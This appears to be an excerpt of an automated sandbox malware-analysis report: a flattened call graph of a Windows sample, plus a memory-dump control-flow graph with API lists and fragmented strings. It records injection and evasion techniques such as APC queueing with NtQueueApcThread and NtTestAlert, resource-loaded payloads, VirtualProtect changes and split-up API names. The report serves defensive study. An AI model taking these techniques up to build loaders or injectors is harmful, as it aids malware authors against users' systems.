40f0ae 17349->17350 17351 40ef96 17349->17351 17352 414330 12 API calls 17350->17352 17353 40f0ca 17351->17353 17354 40efa9 17351->17354 17355 40effb 17351->17355 17352->17353 17356 414330 12 API calls 17353->17356 17357 40f080 17354->17357 17358 40efb2 17354->17358 17355->17344 17359 40f0f0 17356->17359 17360 40f08d 17357->17360 17362 414330 12 API calls 17357->17362 17358->17359 17365 40efbf 17358->17365 17361 414330 12 API calls 17359->17361 17360->17355 17364 414330 12 API calls 17360->17364 17366 40f116 17361->17366 17362->17360 17363 414330 12 API calls 17363->17365 17364->17355 17365->17355 17365->17363 17365->17366 17367 40f126 17366->17367 17368 414330 12 API calls 17366->17368 17367->17344 17368->17367 17370 4102f0 105 API calls 17369->17370 17371 41212c 17370->17371 17378 4120e0 17371->17378 17373 412150 InterlockedDecrement 17376 412147 17373->17376 17374 414330 12 API calls 17374->17376 17375 4120e0 105 API calls 17375->17376 17376->17373 17376->17374 17376->17375 17384 411f10 17376->17384 17379 4102f0 104 API calls 17378->17379 17380 4120eb 17379->17380 17381 412105 17380->17381 17382 412107 InterlockedDecrement 17380->17382 17383 4120fc InterlockedIncrement 17380->17383 17381->17376 17382->17376 17383->17381 17385 4102f0 99 API calls 17384->17385 17389 411f20 17385->17389 17386 411f98 longjmp 17388 411fab CloseHandle 17386->17388 17388->17389 17389->17386 17389->17388 17390 411f42 TlsGetValue 17389->17390 17391 411f88 _endthreadex 17389->17391 17392 411fd7 TlsSetValue 17389->17392 17394 411ffb CloseHandle 17389->17394 17395 411f71 CloseHandle 17389->17395 17396 414330 12 API calls 17389->17396 17397 410860 17389->17397 17412 40fd20 17389->17412 17390->17389 17390->17391 17391->17389 17392->17391 17394->17389 17395->17389 17396->17389 17398 4107c0 106 API calls 17397->17398 17408 41086f 17398->17408 17399 410a26 17400 414660 Sleep 17399->17400 17401 410a32 17400->17401 17401->17401 17402 414330 12 API calls 17402->17408 17404 410875 17404->17389 17405 414660 Sleep 17405->17408 17407 410a00 17409 414330 12 API calls 17407->17409 17408->17399 17408->17402 17408->17404 17408->17405 17408->17407 17411 414700 Sleep Sleep 17408->17411 17449 415520 17408->17449 17464 4157e0 17408->17464 17410 410a1c 17409->17410 17410->17389 17411->17408 17413 40ff66 17412->17413 17414 40fd36 17412->17414 17416 414330 12 API calls 17413->17416 17415 413fd0 102 API calls 17414->17415 17417 40fd3e 17415->17417 17418 40ff82 17416->17418 17420 40ffb6 17417->17420 17421 40fdfe 17417->17421 17448 40fd4c 17417->17448 17423 414330 12 API calls 17418->17423 17419 40fd53 free 17419->17448 17424 414330 12 API calls 17420->17424 17425 40ffd6 17421->17425 17426 40fe15 17421->17426 17421->17448 17422 40fd62 free 17422->17448 17427 40ffac 17423->17427 17424->17425 17428 414330 12 API calls 17425->17428 17429 414330 12 API calls 17426->17429 17426->17448 17427->17389 17428->17448 17429->17426 17430 414330 12 API calls 17431 40ff32 17430->17431 17432 414330 12 API calls 17431->17432 17434 40ff5c 17432->17434 17433 40fdbf 17433->17418 17435 40fdcc 17433->17435 17434->17389 17436 40fde1 17435->17436 17437 40feee 17435->17437 17438 413a00 19 API calls 17436->17438 17437->17430 17441 40fde9 17438->17441 17439 41023b 17442 414330 12 API calls 17439->17442 17440 4100b9 memmove 17440->17448 17441->17389 17443 410263 17442->17443 17444 4100f8 free 17446 41021f 17444->17446 17444->17448 17445 414330 12 API calls 17445->17448 17447 414330 12 API calls 17446->17447 17447->17439 17448->17419 17448->17422 17448->17431 17448->17433 17448->17437 17448->17439 17448->17440 17448->17444 17448->17445 17450 412210 105 API calls 17449->17450 17451 415531 17450->17451 17480 415320 17451->17480 17454 41553c 17454->17408 17455 413fd0 105 API calls 17456 415551 17455->17456 17457 415555 InterlockedIncrement 17456->17457 17461 415575 17456->17461 17458 41556d 17457->17458 17457->17461 17459 413a00 19 API calls 17458->17459 17459->17461 17460 413fd0 105 API calls 17460->17461 17461->17460 17462 413a00 19 API calls 17461->17462 17494 414ed0 17461->17494 17462->17461 17499 414cc0 17464->17499 17466 4157f3 17467 415830 17466->17467 17468 415800 InterlockedDecrement 17466->17468 17473 415818 17466->17473 17470 413fd0 104 API calls 17467->17470 17469 414ed0 19 API calls 17468->17469 17469->17473 17471 41583b 17470->17471 17472 415841 InterlockedIncrement 17471->17472 17471->17473 17474 415863 17472->17474 17475 415857 17472->17475 17473->17408 17513 416830 17474->17513 17476 413a00 19 API calls 17475->17476 17476->17473 17479 413a00 19 API calls 17479->17473 17481 415370 17480->17481 17482 41532b 17480->17482 17483 415240 34 API calls 17481->17483 17484 415334 17482->17484 17485 414330 12 API calls 17482->17485 17488 415363 17482->17488 17483->17482 17486 414700 Sleep Sleep 17484->17486 17485->17484 17487 41533c 17486->17487 17489 415380 17487->17489 17490 415359 17487->17490 17488->17454 17488->17455 17492 414330 12 API calls 17489->17492 17491 414660 Sleep 17490->17491 17493 415361 17491->17493 17492->17490 17493->17488 17495 413a00 19 API calls 17494->17495 17496 414ee8 17495->17496 17497 413a00 19 API calls 17496->17497 17498 414ef2 17497->17498 17498->17461 17500 414d53 17499->17500 17501 414cd5 17499->17501 17502 414330 12 API calls 17500->17502 17503 414700 Sleep Sleep 17501->17503 17502->17501 17506 414ce2 17503->17506 17504 414d20 17508 414330 12 API calls 17504->17508 17505 414cfe 17507 414660 Sleep 17505->17507 17506->17504 17506->17505 17509 414d06 17507->17509 17510 414d3c 17508->17510 17509->17466 17511 414660 Sleep 17510->17511 17512 414d4b 17511->17512 17512->17466 17514 416844 17513->17514 17524 41586e 17513->17524 17515 416864 EnterCriticalSection 17514->17515 17514->17524 17516 4168c0 17515->17516 17517 41687a 17515->17517 17518 416910 LeaveCriticalSection 17516->17518 17519 4168c8 17516->17519 17517->17518 17527 416885 LeaveCriticalSection 17517->17527 17521 412210 102 API calls 17518->17521 17520 416590 102 API calls 17519->17520 17523 4168e7 17520->17523 17521->17524 17526 416928 LeaveCriticalSection 17523->17526 17523->17527 17524->17479 17525 415cc0 7 API calls 17528 4168b3 17525->17528 17529 412210 102 API calls 17526->17529 17527->17525 17530 412210 102 API calls 17528->17530 17529->17524 17530->17524 17532 40f1d5 17531->17532 17533 40f2b9 17531->17533 17534 414700 2 API calls 17532->17534 17535 414330 12 API calls 17533->17535 17536 40f1dd 17534->17536 17537 40f2d5 17535->17537 17539 414330 12 API calls 17536->17539 17542 40f1ea 17536->17542 17538 40f2df calloc 17537->17538 17543 40f307 17538->17543 17544 40f30e 17538->17544 17539->17542 17540 40f1f4 17541 40f1f8 17540->17541 17546 40f20d calloc 17540->17546 17550 40f24b 17541->17550 17551 40f242 17541->17551 17542->17538 17542->17540 17547 40f22f 17543->17547 17545 414330 12 API calls 17544->17545 17548 40f32a 17545->17548 17546->17547 17549 413af0 19 API calls 17547->17549 17549->17551 17553 414660 Sleep 17550->17553 17551->17550 17552 414330 12 API calls 17551->17552 17552->17550 17554 40f258 17553->17554 17554->17102 17556 40fcd0 17555->17556 17557 40fcae TlsAlloc 17555->17557 17559 414330 12 API calls 17556->17559 17558 40fcf5 17557->17558 17564 40fcbf 17557->17564 17563 414330 12 API calls 17558->17563 17562 40fcec 17559->17562 17560 40fcc4 17560->17107 17561 40fd18 abort 17562->17557 17563->17564 17564->17560 17564->17561 17566 413523 17565->17566 17567 413497 17565->17567 17568 414330 12 API calls 17566->17568 17569 414700 2 API calls 17567->17569 17568->17567 17575 41349f 17569->17575 17570 4134f0 17573 414330 12 API calls 17570->17573 17571 4134bc 17572 414660 Sleep 17571->17572 17574 4134c4 17572->17574 17576 41350c 17573->17576 17574->17048 17575->17570 17575->17571 17577 414660 Sleep 17576->17577 17578 41351b 17577->17578 17578->17048 17584 4135e0 17579->17584 17581 4140f3 17582 40f3bd 17581->17582 17583 414100 CloseHandle free 17581->17583 17582->17071 17582->17072 17583->17582 17585 413667 17584->17585 17586 4135fa 17584->17586 17587 414330 12 API calls 17585->17587 17595 4145d0 17586->17595 17587->17586 17589 41360b 17589->17581 17591 414330 12 API calls 17593 41363c 17591->17593 17592 414660 Sleep 17594 413644 17592->17594 17593->17592 17594->17581 17596 4145e5 17595->17596 17597 413602 17595->17597 17596->17597 17598 414601 Sleep 17596->17598 17597->17589 17597->17591 17597->17593 17598->17597 17598->17598 17599 401179 17600 40119e 17599->17600 17601 401490 GetStartupInfoA 17600->17601 17602 4011ee 17600->17602 17604 4014a1 _initterm 17601->17604 17603 401219 InterlockedCompareExchange 17602->17603 17605 401235 17602->17605 17606 40120d Sleep 17602->17606 17603->17602 17603->17605 17611 4014c4 17604->17611 17607 401433 _amsg_exit 17605->17607 17608 401245 17605->17608 17606->17603 17609 40126a 17607->17609 17610 40144d _initterm 17607->17610 17608->17604 17612 401252 17608->17612 17613 401272 17609->17613 17614 401473 InterlockedExchange 17609->17614 17610->17613 17610->17614 17615 4014cb exit 17611->17615 17612->17609 17612->17610 17631 40d0c0 17613->17631 17614->17613 17617 40129c SetUnhandledExceptionFilter 17642 40ee40 InterlockedExchange 17617->17642 17619 4012bd 17620 401338 malloc 17619->17620 17620->17611 17621 401365 17620->17621 17622 401370 strlen malloc memcpy 17621->17622 17622->17622 17623 4013a7 17622->17623 17643 40d430 17623->17643 17625 4013c2 17648 419090 17625->17648 17628 401401 17629 401415 17628->17629 17630 40140b _cexit 17628->17630 17630->17629 17632 40d0c9 17631->17632 17633 40d0d0 17631->17633 17632->17617 17634 40d1c9 17633->17634 17635 40d1aa 17633->17635 17637 40d15b 17633->17637 17634->17635 17639 40d20d 17634->17639 17654 40ce80 17634->17654 17635->17617 17637->17635 17638 40ce80 8 API calls 17637->17638 17637->17639 17638->17637 17639->17635 17640 40d242 VirtualQuery 17639->17640 17640->17635 17641 40d268 VirtualProtect 17640->17641 17641->17639 17642->17619 17644 40d43a 17643->17644 17646 40d3e0 17643->17646 17644->17625 17670 40cbe0 17646->17670 17649 41909a 17648->17649 17650 40d430 4 API calls 17649->17650 17651 4190a6 17650->17651 17681 402075 17651->17681 17655 40d070 17654->17655 17658 40ce9f 17654->17658 17655->17634 17657 40cf66 17659 40cf6e memcpy 17657->17659 17661 40cfa5 VirtualProtect memcpy 17657->17661 17662 40cef7 VirtualQuery 17658->17662 17664 40cf37 VirtualQuery 17658->17664 17667 40d097 17658->17667 17660 40cf84 17659->17660 17660->17634 17661->17660 17663 40cfea 17661->17663 17662->17664 17663->17660 17665 40cfef VirtualProtect 17663->17665 17664->17657 17664->17667 17665->17634 17666 40d0c9 17666->17634 17667->17666 17668 40d242 VirtualQuery 17667->17668 17668->17666 17669 40d268 VirtualProtect 17668->17669 17669->17667 17673 40cb20 17670->17673 17672 40cbef 17672->17625 17674 40cb31 17673->17674 17675 40cbc0 _onexit 17674->17675 17676 40cb3e _lock 17674->17676 17675->17672 17677 40cb57 17676->17677 17678 40cb68 __dllonexit 17677->17678 17679 40cb96 17678->17679 17680 40cba7 _unlock 17679->17680 17680->17672 17697 40e1a0 17681->17697 17683 4020b9 LoadIconA 17685 402161 17683->17685 17686 4021a1 CreateWindowExA 17685->17686 17696 40216e 17685->17696 17687 40224f 17686->17687 17686->17696 17719 401e50 ZwOpenSymbolicLinkObject 17687->17719 17691 4013ee 17691->17615 17691->17628 17694 401ebb 130 API calls 17695 40231d memset NtQueueApcThread NtTestAlert 17694->17695 17695->17696 17728 40e320 17696->17728 17698 40e250 17697->17698 17699 40e1b5 17697->17699 17742 40ec50 strlen 17698->17742 17700 40e1bf 17699->17700 17781 40dcb0 17699->17781 17703 40e1cc 17700->17703 17704 40ec50 12 API calls 17700->17704 17705 40e1d2 17703->17705 17706 40e207 17703->17706 17704->17703 17707 40e1df 17705->17707 17708 40ec50 12 API calls 17705->17708 17709 40e214 17706->17709 17710 40ec50 12 API calls 17706->17710 17760 411c20 GetLastError 17707->17760 17708->17707 17709->17683 17712 40e2e2 17710->17712 17712->17709 17717 40ec50 12 API calls 17712->17717 17713 40e1e9 17714 40e1f4 17713->17714 17716 40ec50 12 API calls 17713->17716 17767 411c90 GetLastError 17714->17767 17716->17714 17717->17709 17718 40e202 17718->17683 17720 401e85 ZwOpenSymbolicLinkObject 17719->17720 17721 401e7e 17719->17721 17720->17721 17722 401ebb 17721->17722 17723 40e1a0 127 API calls 17722->17723 17724 401eff LdrFindResource_U LdrAccessResource NtAllocateVirtualMemory 17723->17724 17725 401fe1 17724->17725 17726 40e320 125 API calls 17725->17726 17727 40206d 17726->17727 17727->17694 17729 40e3d6 17728->17729 17730 40e337 17728->17730 17732 40ec50 12 API calls 17729->17732 17731 40e33d 17730->17731 17734 40dcb0 119 API calls 17730->17734 17733 40e346 17731->17733 17735 40ec50 12 API calls 17731->17735 17732->17730 17738 40ec50 12 API calls 17733->17738 17741 40e34c 17733->17741 17734->17731 17735->17733 17736 40e355 17737 411c90 112 API calls 17736->17737 17740 40e363 17737->17740 17738->17741 17739 40ec50 12 API calls 17739->17736 17740->17691 17741->17691 17741->17736 17741->17739 17743 40db20 17742->17743 17744 40ec71 memcpy CreateMutexA WaitForSingleObject 17743->17744 17745 40ed37 17744->17745 17746 40ed38 FindAtomA 17744->17746 17745->17746 17747 40edd3 17746->17747 17748 40ed4d malloc 17746->17748 17749 40ebe0 GetAtomNameA 17747->17749 17750 40ed65 AddAtomA 17748->17750 17751 40ede6 17749->17751 17754 40ed86 17750->17754 17752 40eda7 ReleaseMutex FindCloseChangeNotification 17751->17752 17752->17699 17791 40ebe0 17754->17791 17757 40edea memset 17757->17752 17759 40ee08 17757->17759 17758 40ed9f free 17758->17752 17759->17752 17761 4102f0 106 API calls 17760->17761 17762 411c36 17761->17762 17763 414700 2 API calls 17762->17763 17764 411c43 17763->17764 17765 414660 Sleep 17764->17765 17766 411c65 SetLastError 17765->17766 17766->17713 17768 4102f0 106 API calls 17767->17768 17769 411ca7 17768->17769 17770 414700 2 API calls 17769->17770 17771 411cb4 17770->17771 17772 411cf0 realloc 17771->17772 17773 411cbc 17771->17773 17774 411d10 realloc 17772->17774 17775 411d84 17772->17775 17777 414660 Sleep 17773->17777 17774->17775 17778 411d2c memset memset 17774->17778 17776 414660 Sleep 17775->17776 17779 411d8c 17776->17779 17780 411cd7 SetLastError 17777->17780 17778->17773 17779->17718 17780->17718 17782 40dcf6 17781->17782 17785 40dcbc 17781->17785 17783 40ec50 12 API calls 17782->17783 17783->17785 17795 4111d0 17785->17795 17787 40dcd9 17788 40dcdf 17787->17788 17790 40ec50 12 API calls 17787->17790 17788->17700 17789 40ec50 12 API calls 17789->17787 17790->17788 17792 40ebf7 17791->17792 17793 40ebf8 GetAtomNameA 17791->17793 17792->17793 17794 40ec10 17793->17794 17794->17757 17794->17758 17796 40dccc 17795->17796 17797 4111ea 17795->17797 17796->17787 17796->17789 17797->17796 17798 40f1c0 21 API calls 17797->17798 17799 4111f8 17798->17799 17800 413fd0 106 API calls 17799->17800 17801 411205 17800->17801 17802 411250 17801->17802 17803 41120b 17801->17803 17806 4102f0 106 API calls 17802->17806 17804 411230 17803->17804 17805 411210 fprintf 17803->17805 17807 413a00 19 API calls 17804->17807 17805->17804 17808 411261 17806->17808 17809 411238 17807->17809 17810 4102f0 106 API calls 17808->17810 17811 40f340 20 API calls 17809->17811 17812 411279 17810->17812 17811->17796 17813 4102f0 106 API calls 17812->17813 17813->17804 17814 40fc09 17815 40fc10 17814->17815 17816 414330 12 API calls 17815->17816 17817 40fc2c 17816->17817 17818 40fcc9 17819 40fcd0 17818->17819 17820 414330 12 API calls 17819->17820 17821 40fcae TlsAlloc 17820->17821 17823 40fcf5 17821->17823 17827 40fcbf 17821->17827 17826 414330 12 API calls 17823->17826 17824 40fcc4 17825 40fd18 abort 17826->17827 17827->17824 17827->17825 17828 40dbc9 17829 40dbd0 17828->17829 17830 40ec50 12 API calls 17829->17830 17831 40db7e 17830->17831 17833 40ec50 12 API calls 17831->17833 17835 40db87 17831->17835 17833->17835 17834 40db97 17836 4112b0 17835->17836 17837 4112cc 17836->17837 17866 4114dd 17836->17866 17838 4112d9 17837->17838 17839 411598 17837->17839 17881 415890 17838->17881 17841 414330 12 API calls 17839->17841 17842 4115b4 17841->17842 17844 414330 12 API calls 17842->17844 17843 4112e1 17843->17842 17848 4112ee 17843->17848 17845 4114b0 17844->17845 17850 414330 12 API calls 17845->17850 17855 4114a2 17845->17855 17878 411462 17845->17878 17846 4114e7 17849 414330 12 API calls 17846->17849 17847 414330 12 API calls 17847->17848 17848->17845 17848->17846 17848->17847 17853 411354 17848->17853 17854 411503 17849->17854 17856 411600 17850->17856 17851 414330 12 API calls 17851->17853 17852 4113ae 17852->17856 17863 4113bd 17852->17863 17853->17845 17853->17851 17853->17852 17853->17854 17857 414330 12 API calls 17854->17857 17861 4114d5 17855->17861 17865 414330 12 API calls 17855->17865 17858 414330 12 API calls 17856->17858 17857->17878 17858->17878 17859 411550 17860 41155d 17859->17860 17859->17878 17864 4157e0 106 API calls 17860->17864 17862 4157e0 106 API calls 17861->17862 17862->17866 17863->17859 17867 4117f4 17863->17867 17868 41140f realloc 17863->17868 17863->17878 17869 411565 17864->17869 17865->17861 17866->17834 17871 414330 12 API calls 17867->17871 17868->17859 17870 411427 17868->17870 17869->17834 17873 411434 memset 17870->17873 17870->17878 17872 41181a 17871->17872 17874 414330 12 API calls 17872->17874 17873->17878 17875 411840 17874->17875 17876 414330 12 API calls 17876->17878 17877 41149a 17877->17855 17879 4117d8 17877->17879 17878->17855 17878->17872 17878->17876 17878->17877 17880 414330 12 API calls 17879->17880 17880->17867 17882 412210 106 API calls 17881->17882 17883 41589e 17882->17883 17884 415320 34 API calls 17883->17884 17885 4158a6 17884->17885 17886 4158aa 17885->17886 17903 414e80 17885->17903 17886->17843 17889 415971 InterlockedIncrement 17901 415947 17889->17901 17890 4158be 17890->17889 17890->17901 17911 411e50 17890->17911 17891 41598a 17891->17843 17894 411e50 106 API calls 17896 415915 17894->17896 17897 41593f 17896->17897 17898 415960 17896->17898 17914 416a70 17896->17914 17899 411e50 106 API calls 17897->17899 17900 411e50 106 API calls 17898->17900 17899->17901 17902 415965 17900->17902 17934 414f30 17901->17934 17902->17889 17904 413fd0 106 API calls 17903->17904 17905 414e92 17904->17905 17906 414e96 17905->17906 17907 413fd0 106 API calls 17905->17907 17906->17890 17908 414eab 17907->17908 17908->17906 17909 413a00 19 API calls 17908->17909 17910 414ebb 17909->17910 17910->17890 17912 4102f0 106 API calls 17911->17912 17913 411e58 17912->17913 17913->17894 17915 412210 106 API calls 17914->17915 17916 416a81 17915->17916 17917 416a95 17916->17917 17933 416a9d 17916->17933 17952 4161d0 17916->17952 17917->17933 17968 416590 EnterCriticalSection InterlockedDecrement LeaveCriticalSection 17917->17968 17920 416ad4 17921 416adb EnterCriticalSection LeaveCriticalSection 17920->17921 17920->17933 17975 415cc0 EnterCriticalSection 17921->17975 17923 416b12 17924 411e50 106 API calls 17923->17924 17923->17933 17925 416b3a 17924->17925 17926 411e50 106 API calls 17925->17926 17927 416b47 17926->17927 17928 413a00 19 API calls 17927->17928 17929 416b5a 17928->17929 17931 416590 106 API calls 17929->17931 17932 416b61 17929->17932 17930 411e50 106 API calls 17930->17933 17931->17932 17932->17930 17933->17896 17935 414f43 17934->17935 17936 414fb5 17934->17936 17938 414700 2 API calls 17935->17938 17937 414330 12 API calls 17936->17937 17937->17935 17939 414f4b 17938->17939 17940 414fdd fprintf exit 17939->17940 17942 414f62 17939->17942 17941 414330 12 API calls 17940->17941 17943 41503f 17941->17943 17944 414f82 17942->17944 17945 414f72 17942->17945 17943->17891 17946 414330 12 API calls 17944->17946 17947 414660 Sleep 17945->17947 17948 414f9e 17946->17948 17949 414f7a 17947->17949 17950 414660 Sleep 17948->17950 17949->17891 17951 414fad 17950->17951 17951->17891 17953 4161e1 17952->17953 17954 416246 17952->17954 17956 414700 2 API calls 17953->17956 17955 414330 12 API calls 17954->17955 17955->17953 17957 4161ee 17956->17957 17958 4161f9 17957->17958 17982 416080 17957->17982 17959 416213 17958->17959 17960 416203 17958->17960 17961 414330 12 API calls 17959->17961 17963 414660 Sleep 17960->17963 17965 41622f 17961->17965 17964 41620b 17963->17964 17964->17917 17966 414660 Sleep 17965->17966 17967 41623e 17966->17967 17967->17917 17969 4165e6 17968->17969 17970 4165de 17968->17970 17971 416290 100 API calls 17969->17971 17970->17920 17972 4165ff EnterCriticalSection 17971->17972 17973 416610 LeaveCriticalSection 17972->17973 17974 416625 InterlockedIncrement 17972->17974 17973->17920 17974->17973 17976 415cf6 17975->17976 17977 415d18 InterlockedExchangeAdd 17975->17977 17976->17977 17978 415cf8 LeaveCriticalSection 17976->17978 17979 415d36 ReleaseSemaphore 17977->17979 17980 415d5d LeaveCriticalSection 17977->17980 17978->17923 17979->17980 17981 415d73 InterlockedExchangeAdd LeaveCriticalSection 17979->17981 17980->17923 17981->17923 17983 416187 17982->17983 17984 41609c 17982->17984 17983->17958 17984->17983 17985 4160ab calloc 17984->17985 17985->17983 17986 4160ce CreateSemaphoreA CreateSemaphoreA 17985->17986 17987 416144 17986->17987 17988 41619f 17986->17988 17989 416190 CloseHandle 17987->17989 17990 416148 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 17987->17990 17991 4161a3 CloseHandle 17988->17991 17992 4161af free 17988->17992 17989->17988 17990->17983 17991->17992 17992->17983 17993 401a9c 17994 401ab0 17993->17994 18000 401aba 17993->18000 17995 401ab5 17994->17995 17996 401ac8 17994->17996 17998 401af8 CreateWindowExA 17995->17998 17995->18000 17997 401c5d 17996->17997 17996->18000 18002 401c37 17996->18002 18004 401879 17997->18004 18001 401b6d SendDlgItemMessageA 17998->18001 18001->18000 18002->18000 18003 401879 128 API calls 18002->18003 18003->18000 18005 40e1a0 127 API calls 18004->18005 18006 4018bd memset 18005->18006 18008 4019c6 18006->18008 18009 401929 18006->18009 18007 401987 18012 40e320 125 API calls 18007->18012 18008->18007 18019 401520 18008->18019 18009->18007 18014 4016d2 18009->18014 18013 401a8e 18012->18013 18013->18000 18015 40e1a0 127 API calls 18014->18015 18018 40170a 18015->18018 18016 40e320 125 API calls 18017 40186e 18016->18017 18017->18007 18018->18016 18020 40e1a0 127 API calls 18019->18020 18022 401558 18020->18022 18021 40e320 125 API calls 18023 4016c7 18021->18023 18022->18021 18023->18007 18024 413c9c 18025 413ca0 18024->18025 18026 414330 12 API calls 18025->18026 18027 413be5 18026->18027 18028 414700 2 API calls 18027->18028 18029 413bef 18028->18029 18030 413c24 18029->18030 18031 413c10 18029->18031 18034 413c83 18029->18034 18035 413c07 18029->18035 18032 413c4f 18030->18032 18033 413c30 18030->18033 18031->18030 18036 413af0 19 API calls 18031->18036 18038 414330 12 API calls 18032->18038 18037 414660 Sleep 18033->18037 18045 414330 12 API calls 18034->18045 18048 413c8c 18034->18048 18035->18031 18039 413cc8 18035->18039 18036->18030 18040 413c38 18037->18040 18041 413c6c 18038->18041 18044 413cd1 18039->18044 18039->18048 18042 414660 Sleep 18041->18042 18046 413c7b 18042->18046 18043 413af0 19 API calls 18043->18030 18047 414330 12 API calls 18044->18047 18045->18048 18047->18048 18048->18043 18049 41529c 18050 4152a0 18049->18050 18051 414330 12 API calls 18050->18051 18052 415250 18051->18052 18053 414700 2 API calls 18052->18053 18054 415258 18053->18054 18055 4152c5 18054->18055 18056 41525d 18054->18056 18068 415130 18055->18068 18057 415266 18056->18057 18058 415278 18056->18058 18060 414660 Sleep 18057->18060 18061 414330 12 API calls 18058->18061 18063 41526e 18060->18063 18061->18057 18062 4152d5 18064 4152e1 18062->18064 18066 414330 12 API calls 18062->18066 18065 414660 Sleep 18064->18065 18065->18063 18066->18064 18069 4151cf 18068->18069 18070 415148 calloc 18068->18070 18069->18062 18070->18069 18071 41516d 18070->18071 18072 413af0 19 API calls 18071->18072 18073 41519b 18072->18073 18074 4151a1 18073->18074 18075 4151e8 free 18073->18075 18076 413af0 19 API calls 18074->18076 18075->18062 18078 4151b4 18076->18078 18077 415200 18080 4140e0 16 API calls 18077->18080 18078->18077 18079 416080 9 API calls 18078->18079 18081 4151cb 18079->18081 18082 41520c free 18080->18082 18081->18069 18083 4140e0 16 API calls 18081->18083 18082->18069 18083->18077

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 0 a20000-a203d9 call a209fc * 2 13 a209ef 0->13 14 a203df-a203e6 0->14 16 a209f1-a209fb 13->16 14->13 15 a203ec-a203f3 14->15 15->13 17 a203f9-a20400 15->17 17->13 18 a20406-a2040f 17->18 18->13 19 a20415-a2042a 18->19 19->13 20 a20430-a20439 19->20 20->13 21 a2043f-a20444 20->21 21->13 22 a2044a-a20459 21->22 23 a20483-a204aa GetNativeSystemInfo 22->23 24 a2045b 22->24 23->13 25 a204b0-a204c7 VirtualAlloc 23->25 26 a2045d-a20463 24->26 27 a204c9-a204d8 25->27 28 a204dc-a204e0 25->28 29 a20465 26->29 30 a20468-a2047a 26->30 27->28 31 a204e2-a204f1 28->31 32 a20504-a20509 28->32 29->30 30->26 33 a2047c 30->33 35 a204fd-a20500 31->35 36 a2051a-a20536 32->36 37 a2050b-a20518 32->37 33->23 38 a20502 35->38 39 a204f3-a204fc 35->39 40 a2056a-a2057b 36->40 41 a20538 36->41 37->36 37->37 38->36 39->35 42 a20581-a20588 40->42 43 a2063e-a2064f 40->43 44 a2053a-a2053e 41->44 42->43 45 a2058e-a20599 42->45 46 a20655-a2066d 43->46 47 a2081e-a20828 43->47 48 a20540-a20554 44->48 49 a2055a-a20568 44->49 45->43 51 a2059f-a205a3 45->51 52 a2066f-a20676 46->52 53 a2067c-a20689 46->53 54 a208e4-a208f7 47->54 55 a2082e-a20841 47->55 48->48 50 a20556 48->50 49->40 49->44 50->49 56 a205a4-a205a7 51->56 52->52 57 a20678 52->57 59 a20751-a2075d 53->59 60 a2068f-a20692 53->60 61 a20997-a209ab 54->61 62 a208fd-a20901 54->62 55->54 58 a20847 55->58 63 a2061b-a20626 56->63 57->53 64 a2084b-a20868 58->64 59->47 67 a20763-a20780 59->67 60->59 65 a20698-a206b0 60->65 83 a209d6-a209e2 call 10002720 61->83 84 a209ad-a209bb 61->84 66 a20902-a20905 62->66 68 a20628-a2062d 63->68 69 a205a9-a205bb 63->69 92 a208c5-a208d3 64->92 93 a2086a 64->93 65->59 70 a206b6-a206c8 65->70 71 a20907-a20917 66->71 72 a20979-a2098a 66->72 87 a20782 67->87 88 a207df-a207e5 67->88 68->56 75 a20633-a20637 68->75 76 a205e5-a205e9 69->76 77 a205bd-a205e3 69->77 80 a206cc-a2073a 70->80 81 a20934-a20936 71->81 82 a20919-a2091b 71->82 72->66 79 a20990 72->79 75->43 90 a205eb-a205f6 76->90 91 a205f8-a205fd 76->91 89 a20619 77->89 79->61 80->80 94 a2073c-a2074b 80->94 85 a20942-a20944 81->85 86 a20938-a20940 81->86 95 a20927-a20932 82->95 96 a2091d-a20925 82->96 100 a209e4-a209ed 83->100 84->83 97 a209bd-a209bf 84->97 107 a20945-a20947 85->107 86->107 99 a20786-a20788 87->99 104 a207e7-a207eb 88->104 105 a20804-a20814 88->105 89->63 90->89 102 a20606-a20609 91->102 103 a205ff-a20604 91->103 92->64 101 a208d9-a208dd 92->101 108 a2086e-a20872 93->108 94->59 106 a2094a-a20955 95->106 96->106 98 a209c0-a209cd 97->98 128 a209cf 98->128 110 a20793-a207a0 99->110 111 a2078a-a20791 99->111 100->16 101->54 102->89 118 a2060b 102->118 115 a2060e-a20616 103->115 104->105 109 a207ed-a207f4 104->109 105->67 112 a2081a 105->112 113 a20960-a20975 106->113 114 a20957-a2095c 106->114 107->106 116 a20874-a2087b 108->116 117 a2087d-a2088a 108->117 109->105 123 a207f6-a207fc 109->123 121 a207a2-a207a7 110->121 122 a207ad-a207c2 110->122 120 a207c3-a207d0 111->120 112->47 113->72 114->113 115->89 124 a208ad-a208b9 116->124 125 a20897-a208ac 117->125 126 a2088c-a20891 117->126 118->115 135 a207d2-a207d6 120->135 136 a207d8 120->136 121->121 129 a207a9 121->129 122->120 123->105 133 a208c1 124->133 134 a208bb-a208bf 124->134 125->124 126->126 127 a20893 126->127 127->125 128->83 129->122 133->92 134->108 135->99 136->88
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00A2048B
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00A204BB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.639673755.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_a20000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                                                                                                                                                        • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                                                                                                                        • API String ID: 2032221330-2899676511
                                                                                                                                                                                                                                                                                                        • Opcode ID: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
                                                                                                                                                                                                                                                                                                        • Instruction ID: a7db9648cac0223ffa654f1cd0ffb1008e3fcaa02fb6ea8a5244b75f42f05c8a
